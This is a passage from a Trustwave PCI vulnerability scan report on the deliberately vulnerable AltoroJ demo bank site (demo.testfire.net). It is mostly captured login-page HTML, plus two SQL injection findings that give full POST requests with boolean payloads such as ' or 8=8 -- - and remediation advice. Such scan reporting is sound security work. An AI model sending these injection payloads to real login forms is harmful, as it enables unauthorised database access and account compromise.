Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 148 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
LinkHeader2" class="focus" href="/index.jsp?content=personal.htm"
>PERSONAL</a></div></td>
<td width="25%" class="cc bt br bb"><div id="Header3"><a id="
LinkHeader3" class="focus" href="/index.jsp?content=business.htm"
>SMALL BUSINESS</a></div></td>
<td width="25%" class="cc bt bb"><div id="Header4"><a id="
LinkHeader4" class="focus" href="/index.jsp?content=inside.htm"
>INSIDE ALTORO MUTUAL</a></div></td>
</tr>
<tr>

<!-- END HEADER -->

<div id="wrapper" style="width: 99%;">

<!-- TOC BEGIN -->


<td valign="top" class="cc br bb">
<br style="line-height: 10px;"/>

<a id="CatLink1" class="subheader" href="index.jsp?


content=personal.htm">PERSONAL</a>
<ul class="sidebar">
<li><a id="MenuHyperLink1" href="index.jsp?
content=personal_deposit.htm">Deposit Product</a></li>
<li><a id="MenuHyperLink2" href="index.jsp?
content=personal_checking.htm">Checking</a></li>
<li><a id="MenuHyperLink3" href="index.jsp?
content=personal_loans.htm">Loan Products</a></li>
<li><a id="MenuHyperLink4" href="index.jsp?
content=personal_cards.htm">Cards</a></li>
<li><a id="MenuHyperLink5" href="index.jsp?

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 149 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
content=personal_investments.htm">Investments &amp;
Insurance</a></li>
<li><a id="MenuHyperLink6"
href="index.jsp?content=personal_other.htm">Other
Services</a></li>
</ul>

<a id="CatLink2" class="subheader"


href="index.jsp?content=business.htm">SMALL BUSINESS</a>
<ul class="sidebar">
<li><a id="MenuHyperLink7"
href="index.jsp?content=business_deposit.htm">Deposit
Products</a></li>
<li><a id="MenuHyperLink8"
href="index.jsp?content=business_lending.htm">Lending
Services</a></li>
<li><a id="MenuHyperLink9"
href="index.jsp?content=business_cards.htm">Cards</a></li>
<li><a id="MenuHyperLink10"
href="index.jsp?content=business_insurance.htm">Insurance</a></li
>
<li><a id="MenuHyperLink11"
href="index.jsp?content=business_retirement.htm">Retirement</a><
/li>
<li><a id="MenuHyperLink12"
href="index.jsp?content=business_other.htm">Other
Services</a></li>
</ul>

<a id="CatLink3" class="subheader"


href="index.jsp?content=inside.htm">INSIDE ALTORO MUTUAL</a>
<ul class="sidebar">
<li><a id="MenuHyperLink13"
href="index.jsp?content=inside_about.htm">About Us</a></li>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 150 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
content=inside_investor.htm">Investor Relations</a></li>
<li><a id="MenuHyperLink17" href="index.jsp?
content=inside_press.htm">Press Room</a></li>
<li><a id="MenuHyperLink18" href="index.jsp?
content=inside_careers.htm">Careers</a></li>
<li><a id="MenuHyperLink19" href="
subscribe.jsp">Subscribe</a></li>
</ul>
</td>
<!-- TOC END -->

<td valign="top" colspan="3" class="bb">


<div class="fl" style="width: 99%;">

<h1>Online Banking Login</h1>

<!-- To get the latest admin login, please contact


SiteOps at 415-555-6159 -->
<p><span id="_ctl0__ctl0_Content_Main_message"
style="color:#FF0066;font-size:12pt;font-weight:bold;">
Login Failed: We're sorry, but this username or
password was not found in our system. Please try again.
</span></p>

<form action="doLogin" method="post" name="login"


id="login" onsubmit="return (confirminput(login));">
<table>
<tr>
<td>
Username:
</td>
<td>
<input type="text" id="uid" name="uid"

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 151 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
value="" style="width: 150px;">
</td>
<td>
</td>
</tr>
<tr>
<td>
Password:
</td>
<td>
<input type="password" id="passw" name="
passw" style="width: 150px;">
</td>
</tr>
<tr>
<td></td>
<td>
<input type="submit" name="btnSubmit"
value="Login">
</td>
</tr>
</table>
</form>

</div>

<script type="text/javascript">
function setfocus() {
if (document.login.uid.value=="") {
document.login.uid.focus();
} else {
document.login.passw.focus();
}

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 152 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
}

function confirminput(myform) {
if (myform.uid.value.length && myform.
passw.value.length) {
return (true);
} else if (!(myform.uid.value.length)) {
myform.reset();
myform.uid.focus();
alert ("You must enter a valid username");
return (false);
} else {
myform.passw.focus();
alert ("You must enter a valid password");
return (false);
}
}
window.onload = setfocus;
</script>
</td>
</div>

<!-- BEGIN FOOTER -->

</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
&nbsp;&nbsp;|&nbsp;&nbsp;

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 153 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
&copy;&nbsp;2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"
>This web application is open source!<span style="color:black;font-
style:italic;font-weight:normal;float:right">&nbsp;<a href="https:
//github.com/AppSecDev/AltoroJ/">Get your copy from GitHub</a> and
take advantage of advanced features</span></span>
<br><br><br>
<div class="disclaimer">
The AltoroJ website is published by IBM Corporation for the sole
purpose of
demonstrating the effectiveness of IBM products in detecting web
application
vulnerabilities and website defects. This site is not a real banking
site. Similarities,
if any, to third party products and/or websites are purely
coincidental. This site is
provided "as is" without warranty of any kind, either express or
implied. IBM does
not assume any risk in relation to your use of this website. For
more information,
please go to <a id="HyperLink7" href="http://www-142.ibm.
com/software/products/us/en/subcategory/SWI10" >http://www-142.
ibm.com/software/products/us/en/subcategory/SWI10</a>.<br /><br
/>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 154 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Copyright &copy; 2008, 2019, IBM Corporation, All rights reserved.
</div>
</div>

</body>
</html>
<!-- END FOOTER -->

Remediation:
This web site responded with content that suggests that the SQL
content injected was possibly interpreted by the SQL database engine,
indicating that the underlying web application may be vulnerable to
SQL Injection (SQLi). This vulnerability could be utilized by an attacker
to access, modify or delete sensitive information within the associated
database instance. Before accepting any user-supplied data, the
application should validate this data's format and reject any characters
that are not explicitly allowed (i.e. a white-list). This list should be as
restrictive as possible. This is particularly important when the original
source of data is beyond the control of the application.

Please note that the listing of SQLi vulnerabilities is not an exhaustive


list, and other SQLi vulnerabilities may exist in the application.

10 SQL Injection Vulnerability 7.5 High Fail URL: http://demo.testfire.net:8080/doLogin


Port: tcp/8080

A SQL injection vulnerability (SQLi) was identified in this web


application. SQL injection is when modified SQL syntax is supplied to a
user defined parameter to have it query the SQL database directly,
which is not the desired intent of the web application. A simple proof
of concept example of this would be for a user to supply "' or SELECT

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 155 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
DATABASES;--" to a user defined parameter and then upon submission,
a list of databases on the system would be supplied for the user
because the SQL query was interpreted directly on the SQL server
instance. SQL injection can be found in many different forms and
combinations so the full request and response that was used
demonstrate this vulnerability has been provided below as evidence.

All SQL Injection vulnerabilities are considered non-compliant by PCI.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:P/A:P
Service: http

Reference:
https://www.owasp.org/index.php/Guide_to_SQL_Injection
https://www.owasp.org/index.php/SQL_Injection

Evidence:
DetectionDetails: Boolean based SQL vulnerability found
POST - http://demo.testfire.net:8080/doLogin - passw
False Injection: ' or 8=6 -- -
True Injection: ' or 8=8 -- -
True and false injections produced different responses
True Request: POST http://demo.testfire.net:8080/doLogin HTTP/1.1
Origin: http://demo.testfire.net:8080
Upgrade-Insecure-Requests: 1
Referer: http://demo.testfire.net:8080/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded

uid=CHSuser&passw=%27+or+8%3D8+--+-&btnSubmit=Login
True Response: HTTP/1.1 500 Internal Server Error

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 156 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Content-Language: en
Content-Length: 1004
Date: Tue, 06 Aug 2019 04:33:46 GMT
Connection: close

<!doctype html><html lang="en"><head><title>HTTP Status 500 ?


Internal Server Error</title><style type="text/css">H1 {font-
family:Tahoma,Arial,sans-serif;color:white;background-
color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-
serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-
family:Tahoma,Arial,sans-serif;color:white;background-
color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-
serif;color:black;background-color:white;} B {font-
family:Tahoma,Arial,sans-serif;color:white;background-
color:#525D76;} P {font-family:Tahoma,Arial,sans-
serif;background:white;color:black;font-size:12px;}A {color :
black;}A.name {color : black;}HR {color :
#525D76;}</style></head><body><h1>HTTP Status 500 ? Internal
Server Error</h1><hr class="line" /><p><b>Type</b> Status
Report</p><p><b>Description</b> The server encountered an
unexpected condition that prevented it from fulfilling the
request.</p><hr class="line" /><h3>Apache
False Request: POST http://demo.testfire.net:8080/doLogin HTTP/1.1
Origin: http://demo.testfire.net:8080
Upgrade-Insecure-Requests: 1
Referer: http://demo.testfire.net:8080/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded

uid=CHSuser&passw=%27+or+8%3D6+--+-&btnSubmit=Login

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 157 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
False Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Transfer-Encoding: chunked
Date: Tue, 06 Aug 2019 04:33:46 GMT

<!-- BEGIN HEADER -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">

<div id="header" style="margin-bottom:5px; width: 99%;">


<form id="frmSearch" method="get" action="/search.jsp">
<table width="100%" border="0" cellpadding="0"
cellspacing="0">

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 158 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<tr>
<td rowspan="2"><a id="HyperLink1" href="
/index.jsp"><img src="/images/logo.gif" width=283
height=80/></a></td>
<td align="right" valign="top">
<a id="LoginLink" href="/logout.jsp"><font
style="font-weight: bold; color: red;">Sign Off</font></a> | <a id="
HyperLink3" href="/index.jsp?content=inside_contact.htm">Contact
Us</a> | <a id="HyperLink4" href="/feedback.jsp">Feedback</a> |
<label for="txtSearch">Search</label>
<input type="text" name="query" id="query" accesskey="S" />
<input type="submit" value="Go" />
</td>
</tr>
<tr>
<td align="right" style="background-image:
url('/images/gradient.jpg');padding:0px;margin:0px;"><img src="
/images/header_pic.jpg" alt="" width=354 height=60/></td>
</tr>
</table>
</form>
</div>

<table cellspacing="0" width="100%">


<tr>
<td width="25%" class="bt br bb"><div id="Header1"><img id="
Image1" src="/images/pf_lock.gif" width=12 height=14 style="vertical-
align: bottom;" alt="Secure Login"/> &nbsp; <a id="AccountLink"
href="/bank/main.jsp" class="focus" >MY ACCOUNT</a></div></td>
<td width="25%" class="cc bt br bb"><div id="Header2"><a id="
LinkHeader2" class="focus" href="/index.jsp?content=personal.htm"
>PERSONAL</a></div></td>
<td width="25%" class="cc bt br bb"><div id="Header3"><a id="

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 159 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
LinkHeader3" class="focus" href="/index.jsp?content=business.htm"
>SMALL BUSINESS</a></div></td>
<td width="25%" class="cc bt bb"><div id="Header4"><a id="
LinkHeader4" class="focus" href="/index.jsp?content=inside.htm"
>INSIDE ALTORO MUTUAL</a></div></td>
</tr>
<tr>

<!-- END HEADER -->

<div id="wrapper" style="width: 99%;">

<!-- TOC BEGIN -->


<td valign="top" class="cc br bb">
<br style="line-height: 10px;"/>

<a id="CatLink1" class="subheader" href="index.jsp?


content=personal.htm">PERSONAL</a>
<ul class="sidebar">
<li><a id="MenuHyperLink1" href="index.jsp?
content=personal_deposit.htm">Deposit Product</a></li>
<li><a id="MenuHyperLink2" href="index.jsp?
content=personal_checking.htm">Checking</a></li>
<li><a id="MenuHyperLink3" href="index.jsp?
content=personal_loans.htm">Loan Products</a></li>
<li><a id="MenuHyperLink4" href="index.jsp?
content=personal_cards.htm">Cards</a></li>
<li><a id="MenuHyperLink5" href="index.jsp?
content=personal_investments.htm">Investments &amp;
Insurance</a></li>
<li><a id="MenuHyperLink6" href="index.jsp?

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 160 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
content=personal_other.htm">Other Services</a></li>
</ul>

<a id="CatLink2" class="subheader"


href="index.jsp?content=business.htm">SMALL BUSINESS</a>
<ul class="sidebar">
<li><a id="MenuHyperLink7"
href="index.jsp?content=business_deposit.htm">Deposit
Products</a></li>
<li><a id="MenuHyperLink8"
href="index.jsp?content=business_lending.htm">Lending
Services</a></li>
<li><a id="MenuHyperLink9"
href="index.jsp?content=business_cards.htm">Cards</a></li>
<li><a id="MenuHyperLink10"
href="index.jsp?content=business_insurance.htm">Insurance</a></li
>
<li><a id="MenuHyperLink11"
href="index.jsp?content=business_retirement.htm">Retirement</a><
/li>
<li><a id="MenuHyperLink12"
href="index.jsp?content=business_other.htm">Other
Services</a></li>
</ul>

<a id="CatLink3" class="subheader"


href="index.jsp?content=inside.htm">INSIDE ALTORO MUTUAL</a>
<ul class="sidebar">
<li><a id="MenuHyperLink13"
href="index.jsp?content=inside_about.htm">About Us</a></li>
<li><a id="MenuHyperLink14"
href="index.jsp?content=inside_contact.htm">Contact Us</a></li>
<li><a id="MenuHyperLink15"
href="cgi.exe">Locations</a></li>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 161 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<li><a id="MenuHyperLink18" href="index.jsp?
content=inside_careers.htm">Careers</a></li>
<li><a id="MenuHyperLink19" href="
subscribe.jsp">Subscribe</a></li>
</ul>
</td>
<!-- TOC END -->

<td valign="top" colspan="3" class="bb">


<div class="fl" style="width: 99%;">

<h1>Online Banking Login</h1>

<!-- To get the latest admin login, please contact


SiteOps at 415-555-6159 -->
<p><span id="_ctl0__ctl0_Content_Main_message"
style="color:#FF0066;font-size:12pt;font-weight:bold;">
Login Failed: We're sorry, but this username or
password was not found in our system. Please try again.
</span></p>

<form action="doLogin" method="post" name="login"


id="login" onsubmit="return (confirminput(login));">
<table>
<tr>
<td>
Username:
</td>
<td>
<input type="text" id="uid" name="uid"
value="" style="width: 150px;">
</td>
<td>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 162 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
</td>
</tr>
<tr>
<td>
Password:
</td>
<td>
<input type="password" id="passw" name="
passw" style="width: 150px;">
</td>
</tr>
<tr>
<td></td>
<td>
<input type="submit" name="btnSubmit"
value="Login">
</td>
</tr>
</table>
</form>

</div>

<script type="text/javascript">
function setfocus() {
if (document.login.uid.value=="") {
document.login.uid.focus();
} else {
document.login.passw.focus();
}
}

function confirminput(myform) {

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 163 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
if (myform.uid.value.length && myform.
passw.value.length) {
return (true);
} else if (!(myform.uid.value.length)) {
myform.reset();
myform.uid.focus();
alert ("You must enter a valid username");
return (false);
} else {
myform.passw.focus();
alert ("You must enter a valid password");
return (false);
}
}
window.onload = setfocus;
</script>
</td>
</div>

<!-- BEGIN FOOTER -->

</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
&nbsp;&nbsp;|&nbsp;&nbsp;

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 164 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
&copy;&nbsp;2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"
>This web application is open source!<span style="color:black;font-
style:italic;font-weight:normal;float:right">&nbsp;<a href="https:
//github.com/AppSecDev/AltoroJ/">Get your copy from GitHub</a> and
take advantage of advanced features</span></span>
<br><br><br>
<div class="disclaimer">
The AltoroJ website is published by IBM Corporation for the sole
purpose of
demonstrating the effectiveness of IBM products in detecting web
application
vulnerabilities and website defects. This site is not a real banking
site. Similarities,
if any, to third party products and/or websites are purely
coincidental. This site is
provided "as is" without warranty of any kind, either express or
implied. IBM does
not assume any risk in relation to your use of this website. For
more information,
please go to <a id="HyperLink7" href="http://www-142.ibm.
com/software/products/us/en/subcategory/SWI10" >http://www-142.
ibm.com/software/products/us/en/subcategory/SWI10</a>.<br /><br
/>

Copyright &copy; 2008, 2019, IBM Corporation, All rights


reserved.
</div>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 165 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
</div>

</body>
</html>
<!-- END FOOTER -->

Remediation:
This web site responded with content that suggests that the SQL
content injected was possibly interpreted by the SQL database engine,
indicating that the underlying web application may be vulnerable to
SQL Injection (SQLi). This vulnerability could be utilized by an attacker
to access, modify or delete sensitive information within the associated
database instance. Before accepting any user-supplied data, the
application should validate this data's format and reject any characters
that are not explicitly allowed (i.e. a white-list). This list should be as
restrictive as possible. This is particularly important when the original
source of data is beyond the control of the application.

Please note that the listing of SQLi vulnerabilities is not an exhaustive


list, and other SQLi vulnerabilities may exist in the application.

11 SQL Injection Vulnerability 7.5 High Fail URL: http://65.61.137.117:8080/doLogin


Port: tcp/8080

A SQL injection vulnerability (SQLi) was identified in this web


application. SQL injection is when modified SQL syntax is supplied to a
user defined parameter to have it query the SQL database directly,
which is not the desired intent of the web application. A simple proof
of concept example of this would be for a user to supply "' or SELECT
DATABASES;--" to a user defined parameter and then upon submission,
a list of databases on the system would be supplied for the user
because the SQL query was interpreted directly on the SQL server

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 166 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
instance. SQL injection can be found in many different forms and
combinations so the full request and response that was used
demonstrate this vulnerability has been provided below as evidence.

All SQL Injection vulnerabilities are considered non-compliant by PCI.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:P/A:P
Service: http

Reference:
https://www.owasp.org/index.php/Guide_to_SQL_Injection
https://www.owasp.org/index.php/SQL_Injection

Evidence:
DetectionDetails: Boolean based SQL vulnerability found
POST - http://65.61.137.117:8080/doLogin - passw
False Injection: ' or 8=6 -- -
True Injection: ' or 8=8 -- -
True and false injections produced different responses
True Request: POST http://65.61.137.117:8080/doLogin HTTP/1.1
Origin: http://65.61.137.117:8080
Upgrade-Insecure-Requests: 1
Referer: http://65.61.137.117:8080/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded

uid=CHSuser&passw=%27+or+8%3D8+--+-&btnSubmit=Login
True Response: HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Content-Language: en

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 167 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Content-Length: 1004
Date: Tue, 06 Aug 2019 04:35:51 GMT
Connection: close

<!doctype html><html lang="en"><head><title>HTTP Status 500 ?


Internal Server Error</title><style type="text/css">H1 {font-
family:Tahoma,Arial,sans-serif;color:white;background-
color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-
serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-
family:Tahoma,Arial,sans-serif;color:white;background-
color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-
serif;color:black;background-color:white;} B {font-
family:Tahoma,Arial,sans-serif;color:white;background-
color:#525D76;} P {font-family:Tahoma,Arial,sans-
serif;background:white;color:black;font-size:12px;}A {color :
black;}A.name {color : black;}HR {color :
#525D76;}</style></head><body><h1>HTTP Status 500 ? Internal
Server Error</h1><hr class="line" /><p><b>Type</b> Status
Report</p><p><b>Description</b> The server encountered an
unexpected condition that prevented it from fulfilling the
request.</p><hr class="line" /><h3>Apache
False Request: POST http://65.61.137.117:8080/doLogin HTTP/1.1
Origin: http://65.61.137.117:8080
Upgrade-Insecure-Requests: 1
Referer: http://65.61.137.117:8080/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded

uid=CHSuser&passw=%27+or+8%3D6+--+-&btnSubmit=Login
False Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 168 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Transfer-Encoding: chunked
Date: Tue, 06 Aug 2019 04:35:51 GMT

<!-- BEGIN HEADER -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">

<div id="header" style="margin-bottom:5px; width: 99%;">


<form id="frmSearch" method="get" action="/search.jsp">
<table width="100%" border="0" cellpadding="0"
cellspacing="0">
<tr>
<td rowspan="2"><a id="HyperLink1" href="
/index.jsp"><img src="/images/logo.gif" width=283

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 169 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
height=80/></a></td>
<td align="right" valign="top">
<a id="LoginLink" href="/logout.jsp"><font
style="font-weight: bold; color: red;">Sign Off</font></a> | <a id="
HyperLink3" href="/index.jsp?content=inside_contact.htm">Contact
Us</a> | <a id="HyperLink4" href="/feedback.jsp">Feedback</a> |
<label for="txtSearch">Search</label>
<input type="text" name="query" id="query" accesskey="S" />
<input type="submit" value="Go" />
</td>
</tr>
